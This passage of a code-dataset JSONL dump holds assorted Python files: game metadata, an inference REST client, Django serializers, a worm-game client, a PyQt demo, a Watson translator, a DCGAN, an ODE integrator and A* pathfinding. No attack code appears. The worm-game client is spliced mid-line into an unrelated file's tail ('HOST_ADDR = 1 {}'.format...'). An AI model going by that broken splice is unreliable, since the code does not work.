speed='Medium'\n )\n\n # ISSUES\n G.add_node('RamRider',\n rarity='Legendary',\n cost=5,\n count=1,\n targets='Buildings',\n flying=False,\n range=1.8,\n hitspeed=1.8,\n speed='Medium'\n )\n\n return G\n\n","sub_path":"meta_handling.py","file_name":"meta_handling.py","file_ext":"py","file_size_in_byte":8269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"10022186","text":"# coding: utf-8\n\nimport json\n\ndicDir = \"../../result/\"\ndic = json.loads(open(dicDir + \"region.json\",\"r\").read())\n\ndef chonghe():\n res = {}\n for i in dic:\n for j in dic[i]:\n if not j in res:\n res[j] = []\n res[j].append(i)\n for i in res:\n if len(res[i]) > 1:\n print(i,res[i])\n\ndef qiyi():\n for i in dic:\n for j in dic[i]:\n if (len(j) == 2 and j[1] == \"区\") or (j[:2] == \"市辖\"):\n print(j,i)\n #idx = dic[i].index(j)\n #del dic[i][idx]\n open(dicDir + \"region.json\",\"w\").write(json.dumps(dic))\n\nif __name__ == \"__main__\":\n chonghe()\n #qiyi()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"157853028","text":"\"\"\"\nScript that takes a picture with the project's Allied Vision camera and sends it\nto an inference server via REST requests. The server returns the inference result,\nwhich is then sent to Kepware and Thingworx. Thingworx also receives the image\nthat was sent to the inference server.\n\nThe inference server runs on an Auto ML Vision's Docker container. The container\nexposes a REST API with which clients can communicate.\n\nChange the values of the following variables to customise the functionality of\nthis script:\n\nTF_SERVING_HOST: URL of the inference host. Defaults to 192.168.1.110.\nTF_SERVING_PORT: Port of the inference host. Defaults to 8501.\nIMAGE_WIDTH: Width to which the acquired image is resized. Default: 160\nIMAGE_HEIGHT: Height to which the acquired image is resized. Default: 160\n\nKEPWARE_HOST: URL of the Kepware server. Defaults to http://192.168.1.25:39320\nTHINGWORX_HOST: URL of the Thingworx server. Defaults to http://192.168.1.97:8003/Thingworx\n\nLOGGING_LEVEL: Logging level. 
Default: DEBUG\nLOG_FILE: File where the messages are logged.\n\"\"\"\n\n# Imports\nimport os\nimport logging\nimport time\n\nimport numpy as np\nimport cv2 # opencv-python==4.1.0.25\n\nimport dcc.utils\nfrom dcc.ilqi_inference import RestInferenceClient\n\n# TODO Get casted environment variables\n\n## Runtime configuration\n# Inference\nTF_SERVING_HOST = os.environ.get('TF_SERVING_HOST', '192.168.1.110')\nTF_SERVING_PORT = os.environ.get('TF_SERVING_PORT', 8501)\n\n# Camera and image settings\nIMAGE_WIDTH = os.environ.get('IMAGE_WIDTH', 160)\nIMAGE_HEIGHT = os.environ.get('IMAGE_HEIGHT', 160)\n\n# Connection\nKEPWARE_HOST = os.environ.get('KEPWARE_HOST', 'http://192.168.1.25:39320')\nTHINGWORX_HOST = os.environ.get('THINGWORX_HOST', 'http://192.168.1.97:8003/Thingworx')\n\n# Logging\nLOGGING_LEVEL = os.environ.get('LOGGING_LEVEL', 'DEBUG')\nLOG_FILE = os.environ.get('LOG_FILE', './quality_inspector/logs/rest_client.log')\n\n# logger\nlogger = None\n\n# Client\nrest_client = None\n\n### Script's main functionality goes into this function\ndef preprocess_image(image):\n    \"\"\"\n    Takes an image, adapts it to what the inference server accepts (serialised\n    jpeg), sends it to the server and processes the result.\n    Args:\n        image: Expects a 3D np.ndarray with dtype=np.uint8\n    \"\"\"\n    # Resize image\n    return cv2.resize(image, (IMAGE_HEIGHT, IMAGE_WIDTH))\n\n### Modify this function only if you know what you're doing\ndef run():\n    \"\"\"\n    Calls the dcc.camera.camera_loop function and passes request_inference()\n    to it. If something goes wrong, the error is logged and the program stops.\n    The programme can also be stopped with the CTRL+C signal.\n    \"\"\"\n    # Execute camera's loop. Prevent the container from \n    while (True):\n        try:\n            # This function runs without stopping\n            rest_client.run_ilqi(preprocess_image=preprocess_image)\n\n        # Terminated by keyboard\n        except KeyboardInterrupt:\n            # Stop the programme and clean up\n            logger.info('Keyboard interruption caught. Programme stopped.')\n            break\n\n        # Some other error. Wait 60 seconds and try to reconnect with the camera again\n        except Exception as e:\n            logger.error(e, exc_info=True)\n            logger.info(\"Error while connecting to the camera. Retrying in 60 seconds.\")\n            time.sleep(60)\n    \n\nif __name__ == '__main__':\n    # Prepare logger instance. 
Logging directory needs to be created in the Dockerfile\n if LOGGING_LEVEL == 'INFO':\n logger = dcc.utils.setup_custom_logger(LOG_FILE, 'ilqi logger', logging.INFO)\n else:\n logger = dcc.utils.setup_custom_logger(LOG_FILE, 'ilqi logger', logging.DEBUG)\n\n # Setup client\n rest_client = RestInferenceClient(TF_SERVING_HOST,\n TF_SERVING_PORT,\n kepware_host=KEPWARE_HOST,\n thingworx_host=THINGWORX_HOST,\n logger=logger)\n\n # Run the programme\n run()\n \n","sub_path":"quality_inspector2/python/inference_rest_client.py","file_name":"inference_rest_client.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"153438266","text":"from rest_framework import serializers\nfrom .models import Stocks, MutualFunds, USStocks, FixedDeposits\n\nclass StocksSerializer(serializers.ModelSerializer):\n class Meta:\n model = Stocks\n fields = ('name', 'price', 'openPrice', 'prevPrice', 'volume', 'value',\n 'marketCap', 'peRatio', 'pbRatio', 'roe', 'eps', 'dividendYield',\n 'industryPE', 'bookValue', 'todayslow', 'todayshigh', 'about', 'parentOrg', 'director', 'NSE', 'founded')\n\n\nclass MutualFundsSerializer(serializers.ModelSerializer):\n class Meta:\n model = MutualFunds\n fields = ('name', 'returns', 'returnsThree', 'returnsFive', 'category', \n 'categoryThree', 'categoryFive', 'risk', 'minSIP', 'expenseRatio', \n 'nav', 'fundStarted', 'fundSize')\n\nclass USStocksSerializer(serializers.ModelSerializer):\n class Meta:\n model = USStocks\n fields = ('name', 'price', 'openPrice', 'prevPrice', 'volume', 'avgVolume',\n 'marketCap', 'peRatio', 'pbRatio', 'roe', 'eps', 'dividendYield',\n 'enterpriseValue', 'bookValue', 'todayslow', 'todayshigh', 'about', 'organisation', 'industry', 'headquarters')\n\nclass FixedDepositsSerializer(serializers.ModelSerializer):\n class Meta:\n model = FixedDeposits\n fields = ('name', 'percentage', 'minAmount', 'compounding', 'preWithdrawal',\n 'about', 'crisilRating', 'CEO', 'headquaters')","sub_path":"stockexchange/stocks/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"520974446","text":"\"\"\" Client implementation \"\"\"\n\nfrom typing import List\nimport sys\n#import pygame\nimport pyxel as P\n\nfrom worm_game import InputHandler, InputState,TCPClient, DEFAULT_PORT,GameState, Snake,Human,Game # Player removed\n\nclass ClientApp:# \"\"\" Client window that connects to the server \"\"\"\n    def __init__(self, host_addr, port = DEFAULT_PORT):\n#        pygame.init()\n        P.init(240,160,scale=2)# pygame >> pyxel\n        self.GS = GameState()\n        self.server_connection = TCPClient((host_addr, port))\n        self.done = 0\n        self.players = []\n        self.inputs = InputHandler()\n\n        self.draw_game = Game().draw_game\n        # might not be needed when syncing to server\n#        self.clock = pygame.time.Clock()\n\n        self.add_player(Human('R1', self.inputs, (P.KEY_LEFT, P.KEY_RIGHT)))\n        self.add_player(Human('R2', self.inputs, (P.KEY_A, P.KEY_D)))#(P.K_LEFT, P.K_RIGHT)\n\n    def add_player(self, player):self.players.append(player)#\"\"\" Add a player to the game. \"\"\"\n\n    def handle_events(self):#\"\"\" Main event pump \"\"\"\n        ''' tmp disable\n        for event in pygame.event.get(): # User did something\n            if event.type == pygame.QUIT: # If user clicked close\n                self.done = 1 # Flag that we are done so we exit this loop\n            else:self.inputs.handle_event(event)\n        '''\n    def update_game_state(self):#\"\"\" Apply server state updates to local state \"\"\"\n        for game_update in self.server_connection.received_game_updates:\n            self.GS.remove_pizzas(game_update.removed_pizzas)\n            self.GS.PZ += game_update.added_pizzas\n            for sid, sdir, rem_count, parts in game_update.snake_updates:\n                while sid >= len(self.GS.SN):self.GS.SN.append(Snake((0, 0, 0)))\n                snake = self.GS.SN[sid]\n                snake.dir = sdir\n                snake.add_parts(parts)\n                snake.remove_n_parts(rem_count)\n        self.server_connection.received_game_updates.clear()\n\n    def update_collision_structures(self):#\"\"\" Update collision structure for the use of AI player \"\"\"\n        for snake in self.GS.SN:\n            self.GS.COLMGR.add_parts(snake.new_parts)\n            self.GS.COLMGR.remove_parts(snake.removed_parts)\n\n    def process_player_input(self):#\"\"\" Resolve player input and push it to server \"\"\"\n        for local_id, player in enumerate(self.players):\n            player.act()\n            self.server_connection.send_snake_input(local_id,player.get_snake_input())\n\n    def run(self):#\"\"\" Main Program Loop \"\"\"\n        for local_id, player in enumerate(self.players):\n            self.server_connection.register_player(local_id, player)#\"\"\" Register client players to the server \"\"\"\n\n        while not self.done:\n            self.handle_events()\n\n            if not self.server_connection.receive_game_uptate():\n                self.done = 1\n                break\n\n            self.update_game_state()\n            self.update_collision_structures()\n            self.process_player_input()\n            self.draw_game(self.GS)\n            #P.display.flip()\n            P.flip()\n            InputState.clear_tick_states()\n            # Client rendering timed by server update messages\n            # self.clock.tick(60)\n        self.server_connection.shutdown()\n#        pygame.display.quit()\n\nHOST_ADDR = 1 {}'.format(k, v))\n    # pass\n\n\nif __name__ == '__main__':\n    count_sum()\n","sub_path":"xiaoscript/product/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"194274766","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nfrom Cython.Compiler.Naming import self_cname\nimport string\n\nform_class = uic.loadUiType(\"myqt04.ui\")[0]\n\nclass MyWindow(QMainWindow, form_class):\n    def __init__(self):\n        super().__init__()\n        self.setupUi(self)\n        self.pb.clicked.connect(self.myclick)\n    \n    def myclick(self):\n        obj = QLineEdit(self.le1)\n        # When you don't know an object's methods, grab it into obj and hit ctrl+space to browse them\n        obj.setText('')\n        \n        num1 = self.le1.text()\n        num2 = self.le2.text()\n        \n        result = 0\n        for i in range(int(num1), int(num2)+1):\n            result += i\n        \n        self.le3.setText(str(result))\n        \nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    myWindow = MyWindow()\n    myWindow.show()\n    app.exec_()","sub_path":"HELLOPYTHON/day04/myqt04.py","file_name":"myqt04.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"396478768","text":"'''\ntranslator.py\nCreates instantiation of IBM Watson Language Translator.\nMethods available to translate text from English to French and from French to English.\n'''\n\nimport json\nimport os\nfrom ibm_watson import LanguageTranslatorV3\nfrom ibm_cloud_sdk_core.authenticators import 
IAMAuthenticator\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napikey = os.environ['apikey']\nurl = os.environ['url']\n\n\nauthenticator = IAMAuthenticator(f'{apikey}')\nlanguage_translator = LanguageTranslatorV3(\n version='2018-05-01',\n authenticator=authenticator\n)\n\nlanguage_translator.set_service_url(f'{url}')\n\ndef english_to_french(english_text):\n \"\"\"\n Returns the french translation of the english text passed in the parameter\n \"\"\"\n if english_text is None:\n return \"\"\n\n translation = language_translator.translate(\n text = english_text,\n model_id = 'en-fr'\n ).get_result()\n french_text = translation['translations'][0]['translation']\n return french_text\n\n\ndef french_to_english(french_text):\n \"\"\"\n Returns the english translation of the french text passed in the parameter\n \"\"\"\n if french_text is None:\n return \"\"\n\n translation = language_translator.translate(\n text = french_text,\n model_id = 'fr-en'\n ).get_result()\n english_text = translation['translations'][0]['translation']\n return english_text\n","sub_path":"final_project/machinetranslation/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"482819612","text":"from corehq.apps.hqwebapp import crispy as hqcrispy\nfrom crispy_forms import layout as crispy\nfrom crispy_forms.bootstrap import StrictButton\n\nfrom django.utils.translation import gettext_lazy as _\nfrom django import forms\nfrom corehq.apps.geospatial.models import GeoConfig\n\n\nLOCATION_SOURCE_OPTIONS = [\n (GeoConfig.CUSTOM_USER_PROPERTY, _(\"Custom user field\")),\n (GeoConfig.ASSIGNED_LOCATION, _(\"User's assigned location\")),\n]\n\n\nclass GeospatialConfigForm(forms.ModelForm):\n\n class Meta:\n model = GeoConfig\n fields = [\n \"user_location_property_name\",\n \"case_location_property_name\"\n ]\n\n user_location_property_name = forms.CharField(\n label=_(\"Fetch mobile worker location data from custom field\"),\n required=True,\n help_text=_(\"The name of the mobile worker custom field which stores the users' geo-location data.\"),\n )\n case_location_property_name = forms.CharField(\n label=_(\"Fetch case location data from property\"),\n required=True,\n help_text=_(\"The name of the case property storing the geo-location data of your cases.\"),\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.helper = hqcrispy.HQFormHelper()\n self.helper.add_layout(\n crispy.Layout(\n crispy.Fieldset(\n _(\"Configure Geospatial Settings\"),\n crispy.Field(\n 'user_location_property_name',\n data_bind=\"value: customUserFieldName\"\n ),\n crispy.Field('case_location_property_name', data_bind=\"value: geoCasePropertyName\"),\n ),\n hqcrispy.FormActions(\n StrictButton(\n _('Save'),\n css_class='btn-primary disable-on-submit',\n type='submit',\n data_bind=\"\"\n )\n )\n )\n )\n","sub_path":"corehq/apps/geospatial/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"295737777","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 07:05:30 2019\n\n@author: Stefan Draghici\n\"\"\"\n\ndef searching(string):\n print('Searching string: {}'.format(string))\n while True:\n name=(yield)\n if string in name:\n print(name)\n 
\nx=searching('hello')\nx.__next__()\nx.send('hello')","sub_path":"couroutine.py","file_name":"couroutine.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"422915271","text":"#DCGAN WITH PERCEPTUAL LOSS FUNCTION USED FOR COLORALIZATION\n\nfrom PIL import Image\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.optim import Adam\nfrom torchvision import transforms\nimport torchvision.datasets as dsets\nimport torch.nn.functional as F\nimport numpy as np\nfrom vgg import Vgg16\nfrom manipulation import save_images\n\nfrom dataloader import *\nfrom utils import *\n\n\n\nclass Discriminator(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv_1 = nn.Conv2d(3, 32, 3, stride=2, padding=2)\n self.conv_2 = nn.Conv2d(32, 64, 3, stride=2, padding=2)\n self.conv_3 = nn.Conv2d(64, 128, 3, stride=2, padding=2)\n self.conv_4 = nn.Conv2d(128, 64, 3, stride=2, padding=2)\n self.conv_5= nn.Conv2d(64, 1, 3, stride=2, padding=2)\n self.conv_1_bn = nn.BatchNorm2d(32)\n self.conv_2_bn = nn.BatchNorm2d(64)\n self.conv_3_bn = nn.BatchNorm2d(128)\n self.conv_4_bn = nn.BatchNorm2d(64)\n\n # should be corrected if new image arrive\n # self.fc = nn.Linear(dim * 4 * 4, 1)\n\n def forward(self, x):\n x = F.leaky_relu(self.conv_1(x), 0.1)\n x = F.leaky_relu(self.conv_2_bn(self.conv_2(x)), 0.1)\n x = F.leaky_relu(self.conv_3_bn(self.conv_3(x)), 0.1)\n x = F.leaky_relu(self.conv_4_bn(self.conv_4(x)), 0.1)\n x = self.conv_5(x)\n x = x.view(x.size(0), -1).mean(1)\n x = F.sigmoid(x)\n\n return x\n\nclass Generator(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.conv_1 = nn.Conv2d(1, 32, 4, stride=2)\n self.conv_2 = nn.Conv2d(32, 64, 3, stride=2)\n self.conv_3 = nn.Conv2d(64, 128, 3, stride=2)\n self.deconv_1 = nn.ConvTranspose2d(128, 64, 3, stride=2)\n self.deconv_2 = nn.ConvTranspose2d(64, 32, 3, stride=2)\n self.deconv_3 = nn.ConvTranspose2d(32, 3, 4, stride=2)\n\n self.conv_1_bn = nn.BatchNorm2d(32)\n self.conv_2_bn = nn.BatchNorm2d(64)\n self.conv_3_bn = nn.BatchNorm2d(128)\n self.deconv_1_bn = nn.BatchNorm2d(64)\n self.deconv_2_bn = nn.BatchNorm2d(32)\n\n def forward(self, x):\n x = F.leaky_relu(self.conv_1(x))\n x = F.leaky_relu(self.conv_2_bn(self.conv_2(x)))\n x = F.leaky_relu(self.conv_3_bn(self.conv_3(x)))\n x = F.leaky_relu(self.deconv_1_bn(self.deconv_1(x)))\n x = F.leaky_relu(self.deconv_2_bn(self.deconv_2(x)))\n x = F.tanh(self.deconv_3(x))\n return x\n\n\ndef train_GAN(use_cuda=False, numb_style_images=100):\n path = \"/data/\" if use_cuda else \"/home/dobosevych/Documents/Cats/\"\n train_loader = load_data(path, upper_bound=21000)\n test_loader = load_data(path, lower_bound=21000, upper_bound=22000)\n\n lr = 0.0002\n betas = (0.5, 0.999)\n discriminator = Discriminator()\n generator = Generator()\n vgg = Vgg16(requires_grad=False)\n if use_cuda:\n vgg.cuda()\n styles = get_gram_matrices(next(iter(train_loader)))\n\n if use_cuda:\n discriminator = discriminator.cuda()\n generator = generator.cuda()\n\n d_optimizer = Adam(discriminator.parameters(), lr=lr, betas=betas)\n g_optimizer = Adam(generator.parameters(), lr=lr, betas=betas)\n criterion_BCE = nn.BCELoss()\n criterion_MSE = nn.MSELoss()\n\n num_epochs = 20\n num_of_samples = 100\n\n for epoch in range(num_epochs):\n for i, (color_images, b_and_w_images) in enumerate(train_loader):\n minibatch = color_images.size(0)\n\n # damaged = make_damaged(images)\n # damaged = Variable(damaged)\n 
color_images = Variable(color_images)\n            b_and_w_images = Variable(b_and_w_images)\n            labels_1 = Variable(torch.ones(minibatch))\n            labels_0 = Variable(torch.zeros(minibatch))\n\n            if use_cuda:\n                color_images, b_and_w_images, labels_0, labels_1 = color_images.cuda(), b_and_w_images.cuda(), labels_0.cuda(), labels_1.cuda()#, damaged.cuda()\n\n            # Generator training\n            # clear stale gradients before the generator update\n            generator.zero_grad()\n            generated_images = generator(b_and_w_images)\n            out = discriminator(generated_images)\n\n\n            styleloss = 0\n\n            for style_img in styles:\n                styleloss += style_loss(style_img, generated_images, vgg, minibatch)\n\n\n\n            # loss_img = criterion_MSE(generated_images, color_images)\n            loss_1 = criterion_BCE(out, labels_1)\n            # g_loss = 100 * loss_img + loss_1\n            g_loss = 100 * styleloss + loss_1\n            g_loss.backward()\n            g_optimizer.step()\n\n            # Discriminator training\n            generated_images = generator(b_and_w_images)\n            discriminator.zero_grad()\n            # detach so the discriminator update does not backpropagate into the generator\n            out_0 = discriminator(generated_images.detach())\n            loss_0 = criterion_BCE(out_0, labels_0)\n\n            out_1 = discriminator(color_images)\n            loss_1 = criterion_BCE(out_1, labels_1)\n\n            d_loss = loss_0 + loss_1\n            d_loss.backward()\n            d_optimizer.step()\n\n            print(\"Epoch: [{}/{}], Step: [{}/{}]\".format(epoch + 1, num_epochs, i + 1, len(train_loader)))\n\n        test_images_color, test_images_bw = next(iter(test_loader))\n        test_images_bw = Variable(test_images_bw)\n\n        if use_cuda:\n            test_images_bw = test_images_bw.cuda()\n\n        test_images_colored = generator(test_images_bw)\n        test_images_colored = test_images_colored.view(num_of_samples, 3, 128, 128).data.cpu().numpy()\n        filename_colored = \"/output/epoch_{}/colored/sample\" if use_cuda else \"samples/epoch_{}/colored/sample\"\n        filename_bw = \"/output/epoch_{}/black_and_white/sample\" if use_cuda else \"samples/epoch_{}/black_and_white/sample\"\n        filename_color = \"/output/epoch_{}/incolor/sample\" if use_cuda else \"samples/epoch_{}/incolor/sample\"\n\n        save_images(test_images_colored, filename=filename_colored.format(epoch + 1), width=10, size=(3, 128, 128))\n        save_images(test_images_bw, filename=filename_bw.format(epoch + 1), width=10, size=(3, 128, 128))\n        save_images(test_images_color, filename=filename_color.format(epoch + 1), width=10, size=(3, 128, 128))\n\n\nif __name__ == \"__main__\":\n    train_GAN(True)\n","sub_path":"DCGAN.py","file_name":"DCGAN.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"530665650","text":"from .. import backend as D\n\n__all__ = [\n    'IntegratorTemplate',\n    'RichardsonIntegratorTemplate'\n]\n\nclass IntegratorTemplate(object):\n    def __init__(self):\n        raise NotImplementedError(\"Do not initialise this class directly!\")\n\n    def forward(self, rhs, initial_time, initial_state, constants, timestep):\n        raise NotImplementedError(\"Do not use this class directly! How did you initialise it??\")\n    \n    def dense_output(self):\n        raise NotImplementedError(\"Do not use this class directly! 
How did you initialise it??\")\n\n __call__ = forward\n\n def update_timestep(self, initial_state, dState, diff, initial_time, timestep, tol=0.8):\n err_estimate = D.max(D.abs(D.to_float(diff)))\n relerr = D.max(D.to_float(self.atol + self.rtol * D.abs(initial_state) + self.rtol * D.abs(dState / timestep)))\n if err_estimate != 0:\n corr = timestep * tol * (relerr / err_estimate) ** (1.0 / self.order)\n if corr != 0:\n timestep = corr\n if err_estimate > relerr:\n return timestep, True\n else:\n return timestep, False\n \n @classmethod\n def __str__(cls):\n return cls.__name__\n \n def __repr__(self):\n if D.backend() == 'torch':\n return \"<{}({},{},{},{},{})>\".format(self.__class__.__name__, self.dim, self.dtype, self.rtol, self.atol, self.device)\n else:\n return \"<{}({},{},{},{})>\".format(self.__class__.__name__, self.dim, self.dtype, self.rtol, self.atol)\n\n\nclass RichardsonIntegratorTemplate(IntegratorTemplate):\n __symplectic__ = False\n __adaptive__ = True\n\n def __init__(self):\n raise NotImplementedError(\"Do not initialise this class directly!\")\n\n def dense_output(self):\n return self.__interpolant_times, self.__interpolants\n \n def adaptive_richardson(self, rhs, t, y, constants, timestep):\n dt0, (dt_z, dy_z) = self.step(0, rhs, t, y, timestep, constants, 1)\n if dt_z < timestep:\n timestep = dt_z\n self.aux[0, 0] = dy_z\n prev_error = None\n for m in range(1, self.richardson_iter):\n self.aux[m, 0] = self.step(m, rhs, t, y, timestep, constants, 1 << m)[1][1]\n for n in range(1, m+1):\n self.aux[m, n] = self.aux[m, n - 1] + (self.aux[m, n - 1] - self.aux[m - 1, n - 1]) / ((1 << n) - 1)\n self.order = self.basis_order + m + 1\n if m >= 3:\n prev_error, t_conv = self.check_converged(self.aux[m, n], self.aux[m - 1, m - 1] - self.aux[m, m], prev_error)\n if t_conv:\n break\n\n return timestep, (timestep, self.aux[m - 1, n - 1]), self.aux[m - 1, m - 1] - self.aux[m, m]\n\n def check_converged(self, initial_state, diff, prev_error):\n err_estimate = D.max(D.abs(D.to_float(diff)))\n relerr = D.max(D.to_float(self.atol + self.rtol * D.abs(initial_state)))\n if prev_error is None or (err_estimate > relerr and err_estimate <= D.max(D.abs(D.to_float(prev_error)))):\n return diff, False\n else:\n return diff, True\n\n def step(self, int_num, rhs, initial_time, initial_state, timestep, constants, num_intervals):\n dt_now, dstate_now = 0.0, 0.0\n dtstep = timestep / num_intervals\n self.__interpolants = []\n self.__interpolant_times = []\n for interval in range(num_intervals):\n dt, (dt_z, dy_z) = self.basis_integrators[int_num](rhs, initial_time + dt_now, initial_state + dstate_now, constants, dtstep)\n dt_now = dt_now + dt_z\n dstate_now = dstate_now + dy_z\n __interp_t, __interp = self.basis_integrators[int_num].dense_output()\n self.__interpolant_times.append(__interp_t)\n self.__interpolants.append(__interp)\n return dtstep, (dt_now, dstate_now)\n\n def forward(self, rhs, initial_time, initial_state, constants, timestep):\n dt0, (dt_z, dy_z), diff = self.adaptive_richardson(rhs, initial_time, initial_state, constants, timestep)\n\n self.dState = dy_z + 0.0\n self.dTime = D.copy(dt_z)\n \n new_timestep, redo_step = self.update_timestep(initial_state, self.dState, diff, initial_time, dt_z, tol=0.5 if self.__implicit__ else 0.9)\n if self.__symplectic__:\n timestep = dt0\n next_timestep = D.copy(dt0)\n if (0.8*new_timestep+0.2*timestep) < next_timestep:\n while new_timestep < next_timestep:\n next_timestep /= 2.0\n else:\n while (0.8*new_timestep+0.2*timestep) > 
2*next_timestep:\n                    next_timestep *= 2.0\n            redo_step = False\n        else:\n            next_timestep = new_timestep\n        if redo_step:\n            timestep, (self.dTime, self.dState) = self(rhs, initial_time, initial_state, constants, next_timestep)\n        else:\n            timestep = next_timestep\n        \n        return timestep, (self.dTime, self.dState)\n\n    __call__ = forward","sub_path":"desolver/integrators/integrator_template.py","file_name":"integrator_template.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"455687708","text":"import pygame\r\nimport math\r\nfrom queue import PriorityQueue\r\n\r\nWIDTH = 900\r\nWIN = pygame.display.set_mode((WIDTH, WIDTH))\r\npygame.display.set_caption(\"A* Path Finding Algorithm\")\r\n\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255, 255, 0)\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nPURPLE = (128, 0, 128)\r\nORANGE = (255, 165 ,0)\r\nGREY = (128, 128, 128)\r\nAGUA = (0, 128, 128)\r\n\r\n\r\n\r\nclass Mark:\r\n\tdef __init__(graph, row, col, width, total_rows):\r\n\t\tgraph.row = row\r\n\t\tgraph.col = col\r\n\t\tgraph.x = row * width\r\n\t\tgraph.y = col * width\r\n\t\tgraph.color = WHITE\r\n\t\tgraph.neighbors = []\r\n\t\tgraph.width = width\r\n\t\tgraph.total_rows = total_rows\r\n\r\n\tdef get_pos(graph):\r\n\t\treturn graph.row, graph.col\r\n\r\n\tdef is_closed(graph):\r\n\t\treturn graph.color == AGUA\r\n\r\n\tdef is_open(graph):\r\n\t\treturn graph.color == GREEN\r\n\r\n\tdef is_barrier(graph):\r\n\t\treturn graph.color == PURPLE\r\n\r\n\tdef is_start(graph):\r\n\t\treturn graph.color == BLACK\r\n\r\n\tdef is_end(graph):\r\n\t\treturn graph.color == RED\r\n\r\n\tdef reset(graph):\r\n\t\tgraph.color = WHITE\r\n\r\n\tdef make_start(graph):\r\n\t\tgraph.color = BLACK\r\n\r\n\r\n\tdef make_closed(graph):\r\n\t\tgraph.color = AGUA\r\n\r\n\tdef make_open(graph):\r\n\t\tgraph.color = GREEN\r\n\r\n\tdef make_barrier(graph):\r\n\t\tgraph.color = PURPLE\r\n\r\n\tdef make_end(graph):\r\n\t\tgraph.color = RED\r\n\r\n\tdef make_path(graph):\r\n\t\tgraph.color = ORANGE\r\n\r\n\tdef draw(graph, win):\r\n\t\tpygame.draw.rect(win, graph.color, (graph.x, graph.y, graph.width, graph.width))\r\n\r\n\tdef update_neighbors(graph, grid):\r\n\t\tgraph.neighbors = []\r\n\t\tif graph.row < graph.total_rows - 1 and not grid[graph.row + 1][graph.col].is_barrier(): \r\n\t\t\tgraph.neighbors.append(grid[graph.row + 1][graph.col])\r\n\r\n\t\tif graph.row > 0 and not grid[graph.row - 1][graph.col].is_barrier(): # UP\r\n\t\t\tgraph.neighbors.append(grid[graph.row - 1][graph.col])\r\n\r\n\t\tif graph.col < graph.total_rows - 1 and not grid[graph.row][graph.col + 1].is_barrier(): # RIGHT\r\n\t\t\tgraph.neighbors.append(grid[graph.row][graph.col + 1])\r\n\r\n\t\tif graph.col > 0 and not grid[graph.row][graph.col - 1].is_barrier(): # LEFT\r\n\t\t\tgraph.neighbors.append(grid[graph.row][graph.col - 1])\r\n\r\n\tdef __lt__(graph, other):\r\n\t\treturn False\r\n\r\n\r\ndef h(p1, p2):\r\n\tx1, y1 = p1\r\n\tx2, y2 = p2\r\n\treturn abs(x1 - x2) + abs(y1 - y2)\r\n\r\n\r\ndef reconstruct_path(came_from, current, draw):\r\n\twhile current in came_from:\r\n\t\tcurrent = came_from[current]\r\n\t\tcurrent.make_path()\r\n\t\tdraw()\r\n\r\n\r\ndef algorithm(draw, grid, start, end):\r\n\tcount = 0\r\n\topen_set = PriorityQueue()\r\n\topen_set.put((0, count, start))\r\n\tcame_from = {}\r\n\tg_score = {mark: float(\"inf\") for row in grid for mark in row}\r\n\tg_score[start] = 0\r\n\tf_score = {mark: 
float(\"inf\") for row in grid for mark in row}\r\n\tf_score[start] = h(start.get_pos(), end.get_pos())\r\n\r\n\topen_set_hash = {start}\r\n\r\n\twhile not open_set.empty():\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.quit()\r\n\r\n\t\tcurrent = open_set.get()[2]\r\n\t\topen_set_hash.remove(current)\r\n\r\n\t\tif current == end:\r\n\t\t\treconstruct_path(came_from, end, draw)\r\n\t\t\tend.make_end()\r\n\t\t\treturn True\r\n\r\n\t\tfor neighbor in current.neighbors:\r\n\t\t\ttemp_g_score = g_score[current] + 1\r\n\r\n\t\t\tif temp_g_score < g_score[neighbor]:\r\n\t\t\t\tcame_from[neighbor] = current\r\n\t\t\t\tg_score[neighbor] = temp_g_score\r\n\t\t\t\tf_score[neighbor] = temp_g_score + h(neighbor.get_pos(), end.get_pos())\r\n\t\t\t\tif neighbor not in open_set_hash:\r\n\t\t\t\t\tcount += 1\r\n\t\t\t\t\topen_set.put((f_score[neighbor], count, neighbor))\r\n\t\t\t\t\topen_set_hash.add(neighbor)\r\n\t\t\t\t\tneighbor.make_open()\r\n\r\n\t\tdraw()\r\n\r\n\t\tif current != start:\r\n\t\t\tcurrent.make_closed()\r\n\r\n\treturn 